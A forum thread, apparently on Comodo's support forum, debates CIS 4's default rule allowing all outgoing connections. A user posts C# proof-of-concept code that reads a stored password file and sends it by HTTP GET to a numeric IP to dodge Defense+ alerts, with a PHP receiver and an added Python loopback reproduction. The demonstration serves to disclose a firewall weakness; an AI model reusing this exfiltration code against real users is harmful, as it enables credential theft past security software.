Allowing all outgoing connections is dangerous

To answer https://forums.comodo.com/news-announcements-feedback-cis/why-is-comodo-not-included-in-mrg-test-merged-t55743.0.html;msg392877#msg392877

Your information can easily be stolen with CIS 4 in the Internet Security configuration.

I just tried making a little application; it reads a file in C:\program files\Myapps and sends the data to an HTTP server.
It's sandboxed, but that's all CIS 4 does.

No alert from the firewall, because of this stupid rule that allows all outgoing connections.

I had just one D+ alert, yes, because I needed DNS for my server... But I only need to connect to an IP and I won't get any other alert except that it was sandboxed.

I took a trivial file, but imagine I upload the Firefox directory, for example: all cookies, saved passwords, history...

Agreed, leave the default settings the same as they are now but remove the allow all connections rule.

This is very dangerous. I’m not sure why it was included to begin with. :-\ I actually receive very few alerts from the firewall anyway.

I know, I already delete it from every CIS 4 I install, and I advise doing the same in the French corner. But not all users read this forum... And it's the default configuration...

Many users have mentioned this in previous posts, but people at Comodo don't seem to be listening.

How many alerts do you need?

Also, Egemen made a post around 5th March about this issue. It's an old issue...

Show us malware in the wild bypassing it; we will be more than grateful for the knowledge and we will improve ASAP.

Thanks
Melih

Did you read what I said? I just have to use an IP and not a domain, and I won't get any alert from D+ because it won't use DNS and Defense+ won't react to this.
But I don't own a server with my own IP. Or must I create a special network at home to show it to you?

Again, please show us in-the-wild malware that bypasses CIS and we will fix it immediately.

Thanks
Melih

So, I changed the application a little, and I set up a server with WAMP on another computer connected to a separate network, to be sure it's not on my local network.

My network is 192.168.0.0/255.255.255.0 and the server is on 78.251.85.0/255.255.255.0.

I try to steal a password from an application that stores it in a file named mypreciousdata.dat in c:\program files\Myapps.

Here is the code of the application in C#:

using System;
using System.IO;
using System.Net;
using System.Windows.Forms;

namespace WindowsFormsApplication1
{
    static class Program
    {
        /// <summary>
        /// Main entry point of the application.
        /// </summary>
        [STAThread]
        static void Main()
        {
            // Read the "secret" the victim application stored on disk.
            string data;
            using (StreamReader monStreamReader = new StreamReader("c:/Program Files/Myapps/mypreciousdata.dat"))
            {
                data = monStreamReader.ReadLine();
            }

            MessageBox.Show("your precious data is : " + data);

            // Plain outgoing HTTP GET to a numeric IP: no DNS lookup, so no D+ alert,
            // and the "allow all outgoing" rule lets it through the firewall.
            // The value is URL-encoded so spaces, '&' and '#' in the secret survive the trip.
            string result;
            using (WebClient client = new WebClient())
            {
                result = client.DownloadString("http://78.251.85.241/echo.php?data=" + Uri.EscapeDataString(data));
            }

            MessageBox.Show("Answer from website : " + result);
        }
    }
}

Code of the PHP server (echo.php):

My stolen data : <?php echo isset($_GET['data']) ? htmlspecialchars($_GET['data']) : ''; ?>

Here we go: I execute my application, CIS sandboxes it (see test1.jpg).

And then the data is sent... the PHP server answered me... (see test2.jpg)

No D+ alert, no firewall alert...

[attachment deleted by admin]
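The exchange in the post above, rebuilt as an added example in Python so it can be run offline; this is not the poster's code and not Comodo's. It assumes a constructed mypreciousdata.dat in a temporary directory and an echo server on the loopback address 127.0.0.1 standing in for the poster's 78.251.85.241 and echo.php. The client connects by numeric IP, so no DNS lookup ever happens, which is the reason the post gives for the missing D+ alert; the only thing the program does to the system is read one file, and the only thing it does to the network is one ordinary outgoing GET.

```python
"""Added example (not from the original post): file read + outgoing HTTP GET
to a numeric IP, with a local stand-in for the echo.php server."""
import http.server
import socketserver
import tempfile
import threading
import urllib.parse
import urllib.request
from pathlib import Path


class EchoHandler(http.server.BaseHTTPRequestHandler):
    """Stand-in for echo.php: reply with the value of the 'data' query parameter."""

    def do_GET(self):
        query = urllib.parse.urlparse(self.path).query
        params = urllib.parse.parse_qs(query)
        data = params.get("data", [""])[0]
        body = ("My stolen data : " + data).encode("utf-8")
        self.send_response(200)
        self.send_header("Content-Type", "text/plain; charset=utf-8")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *_args):
        pass  # keep the example quiet


def start_echo_server(host="127.0.0.1", port=0):
    """Start the echo server in a background thread; returns (server, bound port)."""
    server = socketserver.TCPServer((host, port), EchoHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, server.server_address[1]


def exfiltrate(path, server_ip, port):
    """Read the first line of the secret file and send it as a GET parameter.

    Like the C# WebClient.DownloadString call this is a plain outgoing request:
    nothing is written to the system, and an 'allow all outgoing' rule lets it
    through. The value is URL-encoded so spaces, '&' and '#' survive intact.
    """
    secret = Path(path).read_text(encoding="utf-8").splitlines()[0]
    url = "http://%s:%d/echo.php?%s" % (
        server_ip, port, urllib.parse.urlencode({"data": secret}))
    # Numeric IP in the URL: no DNS resolution. An empty ProxyHandler keeps
    # http_proxy environment variables from redirecting the request.
    opener = urllib.request.build_opener(urllib.request.ProxyHandler({}))
    with opener.open(url, timeout=5) as resp:
        return resp.read().decode("utf-8")


def demo():
    """Build a constructed mypreciousdata.dat, run the exchange, return the reply."""
    with tempfile.TemporaryDirectory() as tmp:
        secret_file = Path(tmp) / "mypreciousdata.dat"
        # Constructed sample secret; the '&' shows why URL-encoding matters.
        secret_file.write_text("hunter2 & more\n", encoding="utf-8")
        server, port = start_echo_server()
        try:
            return exfiltrate(secret_file, "127.0.0.1", port)
        finally:
            server.shutdown()
            server.server_close()


if __name__ == "__main__":
    print(demo())
```

Nothing in this script touches the registry, other processes or the file system beyond one read, which is why a behaviour-based monitor has nothing to react to; the only control point is the outbound connection itself, and that is exactly what an allow-all-outgoing rule removes.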

Let me ask you politely - Are you okay? 88) I mean, what kind of logic is this, huh? You talk and talk and talk about prevention, but now when we ask for PREVENTION for possible exploit(s) you give these lame excuses?

Why do you add Sandbox then? FOR PREVENTION! You have said many times that D+ is almost bullet proof and no malware in the wild can bypass it, but you still added Sandbox for PREVENTION!

We are protecting users from real threats!

If there is a real threat, please give us the malware, so that we can fix it.

Thanks
Melih

So must we create real malware that steals real information to make you understand we are right?

Or are you saying that you (or Comodo) don't want to remove that stupid rule under any condition?

Sometimes Melih’s logic just baffles me and leaves me speechless 88) And arguing with him is like arguing with 5 year old who wants to go to Chuck E. Cheese.

What I am saying is: there is a risk vs. reward ratio. There is no 100% security, and no security vendor tries to close every theoretical hole. Which means the focus has to be on what really matters, which is real malware out there. No point in disturbing the user for theoretical protection.

Hope this clarifies.

Melih

Even if it’s a 1 second fix and everyone’s happy? 88) Just awesome!

Understood.

Yep, get on it. ;D

In all seriousness though, if these "theoretical security holes" can be properly simulated by users, then they can also be used when creating malware.

From what I can tell Shaoran’s program, if it works the way it appears to, is an example of the dangers of the “allow all” rule.

I’m not sure how you can rule it out without properly investigating the code and its implementation.

So why use this kind of rule? It's the only error here, because the application won't do anything to the system; that's why D+ doesn't see anything. It's just about taking a piece of information, and that's all.

You made the rule because you think it will be better for novice users, but what do novice users use? All the applications that lots of people use, and so without any alert, because they are already in your safe list.

So really, why include this rule when it can be a security hole in certain conditions?

I think a way around this rule would be to use the white list for the firewall as well: if the application is signed and part of the white list it gets access; if not, you get asked. I don't think it would be too hard to implement, and that way you would have both security and ease of use.

It's already done. Use the Proactive configuration, for example.

You’re talking about firewall’s Safe Mode which is present in CIS since its beginning.

I personally have a problem with the way the new firewall policy is implemented, rather than with the fact that there exists such a thing as an allow-all-outgoing-connections mode in CIS. By adding this weird policy to the Application Rules in the Network Security Policy, Comodo has practically rendered the Firewall Security Level setting completely useless. IMHO, here is how it should be done...

[attachment deleted by admin]

These possibilities exist IF you can infect the PC in the first place.
So what is being talked about here is NOT even how to infect the PC...
It is: IF they managed to infect the PC, this is how they can extract information.

Hope this clarifies...

Melih